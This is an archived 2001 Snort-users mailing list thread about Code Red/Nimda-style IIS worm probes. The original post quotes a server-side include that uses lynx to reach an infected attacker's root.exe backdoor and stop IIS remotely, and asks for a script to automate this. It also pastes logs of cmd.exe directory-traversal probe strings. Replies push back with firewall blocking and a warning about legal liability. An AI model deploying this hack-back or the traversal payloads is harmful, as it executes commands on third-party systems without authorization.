Snort mailing list archives
RE: Shut them down, I have had enough...
From: "John Berkers" <berjo () ozemail com au>
Date: Wed, 19 Sep 2001 21:58:47 +1000
If you drop the traffic at your router or firewall the SYN packets are the only thing chewing bandwidth. That might be enough to get some bandwidth back for your own use. Fortunately for us, our ISP is still blocking HTTP for our class B, we only have a couple of different Class C's with web servers that are publicly accessible. Regards, John -----Original Message----- From: snort-users-admin () lists sourceforge net [mailto:snort-users-admin () lists sourceforge net]On Behalf Of Franki Sent: Wednesday, 19 September 2001 20:38 To: snort-users () lists sourceforge net Subject: RE: [Snort-users] Shut them down, I have had enough... if I could drop the packets at the ISP end, then that'd be great,, I can't they don't offer that.. unfortunatly, my ISP just emailed me to tell me that they are infected as well... if I drop them or not at my end.., they still chew bandwidth... (I am getting about 100 or more attempts a minute.. and it would be more except my bandwith is low) Also, I think I could defend myself against them,, we have good lawyers, and besides, we were responding to an attack from them,, we didn't go lookin and we object to being attacked by their server... if someone comes to your house with a gun and tries to shoot you, and you shoot them instead,, thats a case for self defence... emailing them doesn't work... been there done that.. if they don't learn, how can we stop them??? the net is so slow over here at the moment, and its mostly caused by shitloads of windows boxs... rgds Frank -----Original Message----- From: Klimarchuk John [mailto:JKLIMARCHUK () TyComLtd com] Sent: Wednesday, 19 September 2001 6:30 PM To: 'franki () gshop com au'; snort-users () lists sourceforge net Subject: RE: [Snort-users] Shut them down, I have had enough... Why don't you just set your firewall to drop all packets coming from that or those ip addresses? Remember, if you send a DDos to that or those servers, you are just as guilty as those administrators of not doing due diligence. Depending on the damage and downtime associated with your proposed DDos, YOU can be held liable. I don't think your company would like that too much! -----Original Message----- From: Franki [mailto:franki () gshop com au] Sent: Wednesday, September 19, 2001 3:03 AM To: snort-users () lists sourceforge net Subject: [Snort-users] Shut them down, I have had enough... Hi all, I have seen in the past a php script that would shut down infected IIS servers that are trying to infect linux box's I havn't done it, because I didn't really think it was that nice a thing to do... This is the one I saw...
1) Create a file called default.ida, in there add this: <!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"--> On one line, if it wraps in your mail client.... 2) Then in your httpd.conf or similar... add this AddType text/html .ida AddHandler server-parsed .ida
but I checked my personal server this morning and the httpd error log looks like this. (see the end of the email) anyway, I'd like to setup the server to shutdown any IIS box that asks for cmd.exe or root.exe Does anyone know how this can be done using either perl or php??? has anyone already done it? if so where can I find it??? I am tired of this, I have a very limited bandwidth, and even if it isn't doing any damage, its chewing up the bandwidth.. and costing me money, as far as I am now concerned, they have three choices, either patch their server, pay my bandwidth bill, or get their servers shut down alot... Any help would be much appreciated. Regards Frank Perth WA [Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida [Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe [Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe [Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [root@mail httpd]# tail -50 error_log [Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../wi nnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c ../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32 /cmd.exe [Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Shut them down, I have had enough... Xno Xutz (Sep 19)
- <Possible follow-ups>
- RE: Shut them down, I have had enough... Klimarchuk John (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)
- RE: Shut them down, I have had enough... John Berkers (Sep 19)
- Re: Shut them down, I have had enough... Jason Costomiris (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)